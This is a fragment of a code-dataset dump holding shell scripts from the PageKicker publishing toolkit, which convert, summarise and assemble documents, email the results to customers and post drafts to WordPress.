\"GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \\\n\t-a $TMPDIR$uuid/slidedeck.pdf\n\n\texit 0\nelif [ \"$decimator_requested\" = \"Include Decimator\" ] ; then\n\techo \"running Decimator,then rest of TAT\"\n\tbin/decimator.sh --pdfinfile \"$TMPDIR$uuid/$uploaded_tat_file\" --outdir \"$TMPDIR$uuid/decimator\"\nelse\n\techo \"Decimator off, proceeding with TAT\"\nfi\n\n# get basename\nfilename=$(basename \"$TMPDIR$uuid/$uploaded_tat_file\")\nfilename=\"${filename%.*}\"\necho \"filename is\" $filename | tee --append $sfb_log\n# get filename extension\nrawextension=$(echo $TMPDIR$uuid/$uploaded_tat_file | sed 's/.*\\.//')\necho \"raw extension is\" $rawextension | tee --append $sfb_log\nextension=`echo \"$rawextension\" | tr '[:upper:]' '[:lower:]'`\necho \"lowercased extension is\" $extension | tee --append $sfb_log\n\n\n# make sure there are txt and pdf target files\n\nif [ \"$extension\" = \"txt\" ] ; then\n\tcp $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\techo \"file was .txt so copied it to targetfile\"\t | tee --append $sfb_log\n\nelif [ \"$extension\" = \"mobi\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted mobi to pdf\" | tee --append $sfb_log\n\tpdftotext $TMPDIR$uuid/mobiconvert.pdf $TMPDIR$uuid/targetfile.txt\n\techo \"converted resulting PDF to txt\" | tee --append $sfb_log\n\nelif [ \"$extension\" = \"azw\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted azw to pdf\" | tee --append $sfb_log\n\tpdftotext $TMPDIR$uuid/azwconvert.pdf $TMPDIR$uuid/targetfile.txt\n\techo \"converted resulting PDF to txt\" | tee --append $sfb_log\n\nelif [ \"$extension\" = \"epub\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted epub to pdf\" | tee --append $sfb_log\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\techo \"converted epub to txt\" | tee --append $sfb_log\n\nelif [ \"$extension\" = \"pdf\" ] ; then\n\n\tqpdf --decrypt $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/decrypted/temp.pdf\n\tcp $TMPDIR$uuid/decrypted/temp.pdf $TMPDIR$uuid/$uploaded_tat_file\n\tpdftotext $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\tcp $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"ran pdftotext and copied $TMPDIR$uuid/target.pdf\" | tee --append $sfb_log\n\tls -la $TMPDIR$uuid\n\nelif [ \"$extension\" = \"md\" ] ; then\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"converted md file to pdf\" | tee --append $sfb_log\n\txvfb-run --auto-servernum ebook-convert $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/targetfile.txt\n\techo \"converted md file to txt\" | tee --append $sfb_log\n\nelse\n\techo \"unoconv debug: TMPDIR $TMPDIR$uuid/$uploaded_tatfile\"\n\techo \"unoconv debug: targetfile $TMPDIR$uuid/targetfile.txt\"\n\tunoconv -f txt $TMPDIR$uuid/$uploaded_tat_file\n\tcp $TMPDIR$uuid/$filename\".txt\" $TMPDIR$uuid/targetfile.txt\n\tunoconv -f pdf $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/target.pdf\n\techo \"file was neither txt, mobi, nor PDF, so converted it to PDF using unoconv\" | tee --append $sfb_log\n\techo \"file might contain images so converted it to PDF for montageur\" | tee --append $sfb_log\n\techo \"debugging else\"\nfi\n\n# catch files without enough text\nwordcount=$(wc -w \"$TMPDIR$uuid/targetfile.txt\"| cut -f1 -d' ')\n\nif [[ \"$wordcount\" -lt \"100\" ]] ; then\n\techo \"converted text has $wordcount words, less than 100 so exiting\"\n\texit 0\nelse\n\techo \"converted text has $wordcount words, enough so continuing\"\n\nfi\n\nif [ \"$extension\" = \"txt\" ] ; then\n\tmontageur_success=\"1\" # exit fail\n\techo \"file was txt, no images, so skipping montageur\" | tee --append $sfb_log\nelse\n\techo \"copying working files into montageur directory\" | tee --append $sfb_log\n\tmkdir -p -m 755 $TMPDIR$uuid/montageur\n\t$scriptpath\"bin/montageur.sh\" --pdfinfile \"$TMPDIR$uuid/target.pdf\" --stopimagefolder \"$scriptpath\"userassets/oreilly/stopimages --passuuid \"$uuid\" --environment \"$environment\" --montageurdir \"montageur\" --maximages \"5\" --tmpdir \"$TMPDIR\" --stopimagefolder \"none\"\n\tmontageur_success=\"$?\"\n\tif [ \"$montageur_success\" = 1 ] ; then\n\t\techo \"montageur exited with status 1 no images found, skipping montage processing and returning to scriptpath directory\" | tee --append $sfb_log\n\telse\n\t\t# echo \"processing montages\"\n\t\tcp $TMPDIR$uuid/$montageurdir/montage.jpg $TMPDIR$uuid/montage.jpg\n\t\tcp $TMPDIR$uuid/$montageurdir/portrait*.jpg $TMPDIR$uuid\n\t\tcp $TMPDIR$uuid/montageurtopn/montagetopn.jpg $TMPDIR$uuid/montagetopn.jpg\n\t\t# make montage PDF pages\n\t\tfor i in $TMPDIR$uuid/portrait*.jpg; do\n\t\tconvert $i -density 300 -units pixelsperinch -gravity center -extent 2550x3300 \"$i\".pdf\n\t\tdone\n\t\tconvert $TMPDIR$uuid/montagetopn.jpg -density 300 -units pixelsperinch -gravity center -extent 2550x3300 $TMPDIR$uuid/montagetopn.pdf\n\t\tcd $TMPDIR$uuid ; pdftk portrait*.jpg.pdf cat output portraits.pdf; cd $scriptpath\n\tfi\n\necho \"processed montages, proceeding to text analysis\" | tee --append $sfb_log\n\nfi\n\n# convert uploaded file to markdown\n\n\"$PANDOC_BIN\" -t markdown $TMPDIR$uuid/targetfile.txt -o $TMPDIR$uuid/body.md\n\n# run acronym filter\n\n$scriptpath/bin/acronym-filter.sh --txtinfile $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/acronyms.txt\n\n# external loop to run NER and summarizer on split file\n\nsplit -b 50000 $TMPDIR$uuid/targetfile.txt \"$TMPDIR$uuid/xtarget.\"\n\nfor file in \"$TMPDIR$uuid/xtarget.\"*\ndo\n\n\"$PYTHON27_BIN\" $scriptpath\"bin/nerv3.py\" $file $file\"_nouns.txt\" $uuid\necho \"ran nerv3 on $file\" | tee --append $sfb_log\n\"$PYTHON_BIN\" bin/PKsum.py -l \"$summary_length\" -o $file\"_summary.txt\" $file\nsed -i 's/ \\+ / /g' $file\"_summary.txt\"\ncp $file\"_summary.txt\" $file\"_pp_summary.txt\"\necho \"ran summarizer on $file\" | tee --append $sfb_log\nawk 'length>=50' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n#echo \"postprocessor threw away summary lines shorter than 50 characters\" | tee --append $sfb_log\nawk 'length<=4000' $file\"_pp_summary.txt\" > $TMPDIR$uuid/awk.tmp && mv $TMPDIR$uuid/awk.tmp $file\"_pp_summary.txt\"\n#echo \"postprocessor threw away summary lines longer than 4000 characters\" | tee --append $sfb_log\n#echo \"---end of summary section of 140K bytes---\" >> $file\"_pp_summary.txt\"\n#echo \"---end of summary section of 140K bytes---\" >> $file\"_summary.txt\"\ncat $file\"_pp_summary.txt\" >> $TMPDIR$uuid/pp_summary.txt\ncat $file\"_summary.txt\" >> $TMPDIR$uuid/summary.txt\n#sleep 3\ndone\nls $TMPDIR$uuid/xtarget.*nouns* > $TMPDIR$uuid/testnouns\ncat $TMPDIR$uuid/xtarget.*nouns* > $TMPDIR$uuid/all_nouns.txt\nsort --ignore-case $TMPDIR$uuid/all_nouns.txt | uniq > $TMPDIR$uuid/sorted_uniqs.txt\nsed -i '1i # Unique Proper Nouns and Key Terms \\n' $TMPDIR$uuid/sorted_uniqs.txt\nsed -i '2i \\' $TMPDIR$uuid/sorted_uniqs.txt\nsed -i G $TMPDIR$uuid/sorted_uniqs.txt\ncp $TMPDIR$uuid/sorted_uniqs.txt $TMPDIR$uuid/sorted_uniqs.md\nsed -i '1i # Programmatically Generated Summary \\' $TMPDIR$uuid/pp_summary.txt\nsed -i G $TMPDIR$uuid/pp_summary.txt\nsed -i '1i # Programmatically Generated Summary \\' $TMPDIR$uuid/summary.txt\nsed -i G $TMPDIR$uuid/summary.txt\n\nif [ `wc -c < $TMPDIR$uuid/pp_summary.txt` = \"0\" ] ; then\n\techo using \"unpostprocessed summary bc wc pp summary = 0\"\nelse\n\tcp $TMPDIR$uuid/pp_summary.txt $TMPDIR$uuid/summary.md\nfi\n\n# readability report\n\njava -jar lib/CmdFlesh.jar $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/rr.txt\nsed -i 's/Averaage/Average/g' $TMPDIR$uuid/rr.txt\necho \"# Readability Report\" > $TMPDIR$uuid/rr.md\ncat $TMPDIR$uuid/rr.txt >> $TMPDIR$uuid/rr.md\ncat assets/rr_explanation.md >> $TMPDIR$uuid/rr.md\n\"$PANDOC_BIN\" $TMPDIR$uuid/rr.md -o $TMPDIR$uuid/rr.html\nsed -i G $TMPDIR$uuid/rr.md\n\n\necho \"ran readability report\" | tee --append $sfb_log\n\n# wordcloud\n\njava -jar lib/IBMcloud/ibm-word-cloud.jar -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -h \"5100\" -w \"6600\" < $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/wordcloudbig.png\n\njava -jar lib/IBMcloud/ibm-word-cloud.jar -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -h \"3100\" -w \"2400\" < $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/wc_front.png\n\necho \"built wordclouds\" | tee --append $sfb_log\n\n# build page burst\n\n#convert $TMPDIR$uuid/downloaded.pdf -thumbnail 'x300>' -border 2x2 $TMPDIR$uuid/outfile.png\n#montage $TMPDIR$uuid/outfile*.png -size 3100x2000\\> $TMPDIR$uuid/burst.png\n#convert $TMPDIR$uuid/burst.png -resize 3100x2000 $TMPDIR$uuid/big_burst.png\n\n#convert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Page Burst\" $TMPDIR$uuid/burst_top.png\n#convert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/burst_bot.png\n\n#convert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n#$TMPDIR$uuid/burst_top.png -gravity north -composite \\\n#$TMPDIR$uuid/big_burst.png -gravity center -composite \\\n#$TMPDIR$uuid/burst_bot.png -gravity south -composite \\\n#$TMPDIR$uuid/pageburst.png\n\n\n# flickr\n\nif [ \"$flickr\" = \"on\" ] ; then\n\n\tmkdir -p -m 755 $TMPDIR$uuid/flickr\n\n\tpython includes/Flickr_title_fetcher.py $TMPDIR$uuid/titles.txt $TMPDIR$uuid/flickr/\n\tpython includes/Flickr_seed_fetcher.py \"$imagekeyword\" $TMPDIR$uuid/flickr/\n\techo \"fetched Flickr images on \" $imagekeyword | tee --append $sfb_log\n\nelse\n\n\techo \"flickr search was off\" | tee --append $sfb_log\n\nfi\n\necho \"$confdir\"jobprofiles/imprints/$imprint/\"$imprintlogo\"\ncp assets/PageKicker_cmyk300dpi.png $TMPDIR$uuid/PageKicker_cmyk300dpi.png\ncp \"$confdir\"jobprofiles/imprints/$imprint/\"$imprintlogo\" $TMPDIR$uuid/$imprintlogo\n\nif [ \"$frontmatter\" = \"off\" ] ; then\n\n\techo \"not building front matter\" | tee --append $sfb_log\nelse\n\n\techo \"copyright page for this imprint is\" $imprintcopyrightpage\n\tcp \"$confdir\"jobprofiles/imprints/$imprint/$imprintcopyrightpage $TMPDIR$uuid/$imprintcopyrightpage\n\t# save reports as PDFs\n\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/summary.md -o $TMPDIR$uuid/summary.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/all_nouns.txt -o $TMPDIR$uuid/all_nouns.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/$imprintcopyrightpage -o $TMPDIR$uuid/copyright_notice.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/rr.md -o $TMPDIR$uuid/rr.pdf --latex-engine=xelatex\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/sorted_uniqs.txt -o $TMPDIR$uuid/sorted_uniqs.pdf --latex-engine=xelatex\n\n# build wordcloud page\n\n\n\tconvert -size 2550x3300 xc:white $TMPDIR$uuid/wc_canvas.jpg\n\tconvert $TMPDIR$uuid/wc_canvas.jpg $TMPDIR$uuid/wc_front.png -resize 2550x3300 -density 300 -gravity center -composite $TMPDIR$uuid/wordcloud.pdf\n\n\techo \"about to build title page\"\n# (PageKicker_cmyk300dpi.png)\n\techo \"# \"$customtitle > $TMPDIR$uuid/titlepage.md\n\techo \"# \"$editedby >> $TMPDIR$uuid/titlepage.md\n\techo \"# Enhanced with Text Analytics by PageKicker Robot\" $jobprofilename >> $TMPDIR$uuid/titlepage.md\n\n\tif [ -z ${tldr+x} ];\n\t\tthen echo \"tldr is unset\"\n\telse\n\t\techo \"# \" 'TL;DR:' \"$tldr\" >> $TMPDIR$uuid/titlepage.md\n\tfi\n\n\techo '![imprint logo]'\"($imprintlogo)\"'\\' >> $TMPDIR$uuid/titlepage.md\n\techo '\\pagenumbering{roman}' >> $TMPDIR$uuid/titlepage.md\n\techo '\\newpage' >> $TMPDIR$uuid/titlepage.md\n\t# build \"also by this Robot Author\"\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\techo \"# Also by PageKicker Robot\" $lastname >> $TMPDIR$uuid/titlepage.md\n\tcat $LOCAL_DATA/bibliography/robots/$jobprofilename/$jobprofilename\"_titles.txt\" >> $TMPDIR$uuid/titlepage.md\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\techo \" \" >> $TMPDIR$uuid/titlepage.md\n\tcd $TMPDIR$uuid\n\t\"$PANDOC_BIN\" $TMPDIR$uuid/titlepage.md -o $TMPDIR$uuid/titlepage.pdf --variable fontsize=12pt --latex-engine=xelatex\n\tcd $scriptpath\n\n\techo \"# About the Robot Author\" > $TMPDIR$uuid/robot_author.md\n\techo \"# $lastname\" >> $TMPDIR$uuid/robot_author.md\n\tcat \"$authorbio\" >> $TMPDIR$uuid/robot_author.md\n\tcp \"$confdir\"jobprofiles/authorphotos/$authorphoto $TMPDIR$uuid\n\n\techo \"built author page\"\n\n\t# build \"Acknowledgements\"\n\n\tcp assets/acknowledgements.md $TMPDIR$uuid/acknowledgements.md\n\techo \"sigfile is\" $sigfile\n\tcp \"$confdir\"jobprofiles/signatures/$sigfile $TMPDIR$uuid\n\n\techo \" \" >> $TMPDIR$uuid/acknowledgements.md\n\techo \" \" >> $TMPDIR$uuid/acknowledgements.md\n\n\techo '![author-sig]'\"(\"$sigfile\")\" >> $TMPDIR$uuid/acknowledgements.md\n\n\techo \"built acknowledgments\"\n\n\t# assemble front matter\n\n\tcat $TMPDIR$uuid/titlepage.md assets/newpage.md $TMPDIR$uuid/$imprintcopyrightpage assets/newpage.md $TMPDIR$uuid/robot_author.md assets/newpage.md $TMPDIR$uuid/acknowledgements.md assets/newpage.md $TMPDIR$uuid/summary.md assets/newpage.md $TMPDIR$uuid/rr.md assets/newpage.md $TMPDIR$uuid/sorted_uniqs.md > $TMPDIR$uuid/textfrontmatter.md\n\tcd $TMPDIR$uuid; \"$PANDOC_BIN\" textfrontmatter.md --latex-engine=xelatex -o textfrontmatter.pdf ; cd $scriptpath\n\n\techo \"assembled front matter\"\n\n\t# add wordcloud page to front matter\n\n\n\tif [ \"$montageur_success\" = 0 ] ; then\n\n\t\tpdftk $TMPDIR$uuid/textfrontmatter.pdf $TMPDIR$uuid/wordcloud.pdf output $TMPDIR$uuid/$uuid\"_frontmatter.pdf\"\n\t# temporarily removed $TMPDIR$uuid/portraits.pdf from front matter as does not seem overly useful\n\n\telse\n\n\t\tpdftk $TMPDIR$uuid/textfrontmatter.pdf $TMPDIR$uuid/wordcloud.pdf output $TMPDIR$uuid/$uuid\"_frontmatter.pdf\"\n\n\tfi\n\n\techo \"appended PDF wordcloud page to PDF front matter\"\n\n\t# add front matter to complete text\n\n\t#resize uploaded file to letter size\n\n\t# gs -sDEVICE=pdfwrite -sPAPERSIZE=letter -dFIXEDMEDIA -dPDFFitPage -dCompatibilityLevel=1.4 -o $TMPDIR$uuid/lettersize_upload.pdf $TMPDIR$uuid/$uploaded_tat_file\n\tcp $TMPDIR$uuid/$uploaded_tat_file $TMPDIR$uuid/lettersize_upload.pdf\n\n pdftk $TMPDIR$uuid/$uuid\"_frontmatter.pdf\" $TMPDIR$uuid/lettersize_upload.pdf output $TMPDIR$uuid/$uuid\"_front_body.pdf\"\n\nfi\n\n\nif [ \"$backmatter\" = \"off\" ] ; then\n\techo \"not building back matter\" | tee --append $sfb_log\nelse\n\n\t# build back matter beginning with flickr\n\n\tif [ \"$flickr\" = \"on\" ] ; then\n\n\t\tcd $TMPDIR$uuid/flickr\n\t\tfor file in *.md\n\t\tdo\n\t\t cat $file >> allflickr.md\n\t\t echo '\\newpage' >> allflickr.md\n\t\t echo \"\" >> allflickr.md\n\t\tdone\n\t\tcp *.jpg ..\n\t\tcp allflickr.md ..\n\t\tcd ..\n\t\t\"$PANDOC_BIN\" -o images.pdf allflickr.md\n\t\tcd $scriptpath\n\t\techo \"converted flickr md files to pdf pages with images\" | tee --append $sfb_log\n\n\telse\n\t\techo \"didn't process flickr files\" | tee --append $sfb_log\n\tfi\nfi\n\n\nmkdir -p 755 $mediatargetpath$uuid\n\nif [ \"$montageur_success\" = 0 ] ; then\n\n\tcp $TMPDIR$uuid/montage.jpg $mediatargetpath$uuid/$sku\"montage.jpg\"\n\tcp $TMPDIR$uuid/montagetopn.jpg $mediatargetpath$uuid/$sku\"montagetopn.jpg\"\nelse\n\techo \"no montageur files to move\"\nfi\n\n# concatenate markdown files\ncat $TMPDIR$uuid/textfrontmatter.md $TMPDIR$uuid/body.md > $TMPDIR$uuid/complete.md\n\n# create metadata\n\ntwitter_announcement=\"no\"\n\nif [ \"$twitter_announcement\" = \"yes\" ] ; then\n\n echo -n \"t update \" > $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n echo -n Just ran Text Analysis Tools job $uuid >> $TMPDIR$uuid/tcommand\n echo -n \\\" >> $TMPDIR$uuid/tcommand\n . $TMPDIR$uuid/tcommand\n\nelse\n echo \"no twitter announcement\" | tee --append $sfb_log\n\nfi\n\nfb_announcement=\"no\"\n\nif [ \"$fb_announcement\" = \"yes\" ] ; then\n\n cloud_delivery_root=\"$WEB_HOST\"\n cloud_delivery_path=\"magento/media/delivery/uuid/$uuid/\"\n cloud_delivery_url=$cloud_delivery_root$cloud_delivery_path\"wordcloud.jpg\"\n\n fbcmd PPOST 472605809446163 \"PageKicker Robot Igor just ran his Text Analysis Tools and created a wordcloud for $customer_name at $cloud_delivery_url\"\n\nelse\n echo \"no fb notification\" | tee --append $sfb_log\nfi\n\n\nif [ \"$montageur_success\" = 0 ] ; then\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Document Analysis Tools Result\" \\\n\t-m \"PageKicker's Document Analysis Robots living on \"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \". A word cloud, an image montage, a list of proper nouns, a programmatic summary, a list of acronyms, and additional files are attached.\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \\\n\t-a $TMPDIR$uuid/wordcloudbig.png \\\n\t-a $TMPDIR$uuid/summary.txt \\\n\t-a $TMPDIR$uuid/pp_summary.txt \\\n\t-a $TMPDIR$uuid/all_nouns.txt \\\n\t-a $TMPDIR$uuid/acronyms.txt \\\n\t-a $logdir$uuid\"/xform_log\" \\\n\t-a $TMPDIR$uuid/rr.md \\\n\t-a $TMPDIR$uuid/montage.jpg \\\n\t-a $TMPDIR$uuid/montagetopn.jpg\n\nelse\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Document Analysis Tools Result\" \\\n\t-m \"PageKicker's Document Analysis Robots living on \"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \". A word cloud, an image montage, a list of proper nouns, a list of possible acronyms and a programmatic summary, are attached.\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \\\n\t-a $TMPDIR$uuid/wordcloudbig.png \\\n\t-a $TMPDIR$uuid/summary.txt \\\n\t-a $TMPDIR$uuid/pp_summary.txt \\\n\t-a $TMPDIR$uuid/all_nouns.txt \\\n\t-a $TMPDIR$uuid/acronyms.txt \\\n\t-a $logdir$uuid/xform_log \\\n\t-a $TMPDIR$uuid/research_report.docx \\\n\t-a $TMPDIR$uuid/rr.md\n\nfi\n" }, { "alpha_fraction": 0.7218543291091919, "alphanum_fraction": 0.7251655459403992, "avg_line_length": 24.80341911315918, "blob_id": "8ab04c9467842fc4a24a51421cf374d3d7c40bb6", "content_id": "c0ebf87be77ebdc965ffd3c8c4edb880588fb38a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3020, "license_type": "permissive", "max_line_length": 225, "num_lines": 117, "path": "/scripts/includes/document-assembler.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nunformattedwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt`\nwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt | sed -e :a -e 's/\\(.*[0-9]\\)\\([0-9]\\{3\\}\\)/\\1,\\2/;ta' `\ncp tmp/$uuid/tmp.cumulative.txt tmp/$uuid/test.cumulative.txt\n\necho \"wordcount is\" $wordcount | tee --append $sfb_log\necho \"unformatted wordcount is\" $unformattedwordcount | tee --append $sfb_log\n\n# the html home page header and footer are already stored in includes/temptoc_*\n\ncase $booktype in\n\nReader)\n\n\techo $\"Foreword\" $p >> tmp/$uuid/shortdescription.html\n\n\tif [ $userdescription = \"yes\" ] ; then\n\n\t\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/shortdescription.html\n\t\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/lsi-shortdescription.txt\n\n\telse\n\n\t\ttrue\n\n\tfi\n\n\techo $\"This unique, differentiated, enhanced\" $booktype $\"in e-book format consists of\" $doccount $\"documents for a total of \"$wordcount $\"words.\" | tee --append tmp/$uuid/shortdescription.html tmp/$uuid/shortdescription.txt\n\n\techo $p >> tmp/$uuid/shortdescription.html\n\n\tcat ../conf/jobprofiles/seriesdescriptions/$seriesdescriptionfilename >> tmp/$uuid/shortdescription.html\n\n\techo $\"About the Author\"$p >> tmp/$uuid/shortdescription.html\n\n\tcat \"$authorbio\" >> tmp/$uuid/shortdescription.html\n\n\tcat \"$authorbio\" >> tmp/$uuid/book-description.txt\n\n\n\techo $\"Dedication\" \\n >> tmp/$uuid/dedication.txt\n\n\techo $\"Dedication\" $p >> tmp/$uuid/dedication.html\n\n #echo \"<center>\" >> tmp/$uuid/shortdescription.html\n\n\t# echo $angbr\"img src=\"$dq$dingbat$dq$endbr >> tmp/$uuid/shortdescription.html\n\n\t#echo \"</center>\" >> tmp/$uuid/shortdescription.html\n\n\t# cat includes/wordcloudpagefooter.html >> tmp/$uuid/shortdescription.html\n\n\t;;\n\n\tExplorer)\n\n\t\n\t;;\n\n\t*)\n\n\t;;\n\n\tesac\n\nebook-convert tmp/$uuid/shortdescription.html tmp/$uuid/shortdescription.txt\n\n# build ad section html for long description\n\ncat tmp/$uuid/stored-descriptions.html >> tmp/$uuid/longdescription.html\ncat tmp/$uuid/lsi-stored-descriptions.txt >> tmp/$uuid/lsi-longdescription.txt\n\n\n# add front and back matter to cumulative.html and txt files\n\n\n\ncase $booktype in\n\n\n\nReader)\n\ncat tmp/$uuid/html_header.html > tmp/$uuid/cumulative.html\n\ncat tmp/$uuid/shortdescription.html >> tmp/$uuid/cumulative.html\n\ncat ../conf/jobprofiles/dedications/$dedicationfilename >> tmp/$uuid/cumulative.html\n\ncat tmp/$uuid/tmp.cumulative.html >> tmp/$uuid/cumulative.html\n\ncat tmp/$uuid/shortdescription.txt >> tmp/$uuid/cumulative.txt\n\ncat ../conf/jobprofiles/dedications/$dedicationfilename | html2text >> tmp/$uuid/cumulative.txt\n\n# filter cumulative.txt for [Image]\n\ncat tmp/$uuid/tmp.cumulative.txt | grep -v '\\[Image\\]$' >> tmp/$uuid/filtered.cumulative.txt\n\ncat tmp/$uuid/filtered.cumulative.txt >> tmp/$uuid/cumulative.txt\n\n;;\n\nExplorer) \n;;\n*)\n\nesac\n\necho $h1 $\"Appendix\" $h1end >> tmp/$uuid/cumulative.html\n\ncat includes/wikilicense.html >> tmp/$uuid/cumulative.html\n\necho $\"Appendix\" >> tmp/$uuid/cumulative.txt\n\necho \"\" >> tmp/$uuid/cumulative.txt\n\ncat includes/wikilicense.txt >> tmp/$uuid/cumulative.txt\n" }, { "alpha_fraction": 0.6808510422706604, "alphanum_fraction": 0.6978723406791687, "avg_line_length": 28.375, "blob_id": "c525fb92a09a1dfe4010d033cc408f4f6f4c4a21", "content_id": "75bebf1f35b4d5d38f6536661cae3702c61d5841", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 235, "license_type": "permissive", "max_line_length": 95, "num_lines": 8, "path": "/scripts/bin/epubcheck_dir.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfor file in *.epub\ndo\n\techo \"validating \" $file\n\tjava -jar /home/fred/sfb/sfb-latest/trunk/scripts/lib/epubcheck-3.0/epubcheck-3.0.jar \"$file\" \n\techo \"exit status for file\" $file \"was\" $? | tee --append epubcheck_err\ndone\n" }, { "alpha_fraction": 0.5622377395629883, "alphanum_fraction": 0.5790209770202637, "avg_line_length": 15.067416191101074, "blob_id": "c4dc51c28f6b08f02d8da82f4ccb094519d87236", "content_id": "68c624955ec5feeb235dbf1bd5a866bf1d18e4e4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1430, "license_type": "permissive", "max_line_length": 106, "num_lines": 89, "path": "/scripts/wp-poster.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# shares text or markdown file to wordpress\n\n# input: text file as --txtinfile\n# output: wordpress draft\n# flags: --verbose \"y\" (stupidly requires y)\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--title)\ntitle=$2\nshift 2\n;;\n--title=*)\ntitle=${1#*=}\nshift\n;;\n--WP_INSTALL)\nWP_INSTALL=$2\nshift 2\n;;\n--WP_INSTALL=*)\nWP_INSTALL=${1#*=}\nshift\n;;\n--WP_BIN)\nWP_BIN=$2\nshift 2\n;;\n--WP_BIN=*)\nWP_BIN=${1#*=}\nshift\n;;\n--verbose|v)\nverbose=$2\nshift 2\n;;\n--verbose|v=*)\nverbose=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. See --help\" >&2\n exit 1\nfi\nif [ ! \"$title ]; then\n echo \"ERROR: option '--title[title]' not given. See --help\" >&2\n exit 1\nfi\n\nif [ \"$verbose\" = \"y\" ] ; then\n\techo \"text infile is \"$txtinfile\nelse\n\ttrue\nfi\n\n\"$WP_BIN\" post \"$WP_INSTALL\" create \"$txtinfile\" --post_type=post --post_status=draft --post_title='title'\n" }, { "alpha_fraction": 0.6851063966751099, "alphanum_fraction": 0.6900709271430969, "avg_line_length": 38.13888931274414, "blob_id": "698735f2b1f17c70883e2ae5bd2466a0a0b7debc", "content_id": "41e59b37a70bfa945a0e4faf96133cfe95508e34", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1410, "license_type": "permissive", "max_line_length": 161, "num_lines": 36, "path": "/scripts/includes/fork-search-results.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\n\twhile IFS='\t' read url title description\n\tdo\t\n\n\techo 'processing fetch lists' | tee --append $sfb_log\n\n\techo \"url is\" $url\n\twikiurl=$(echo 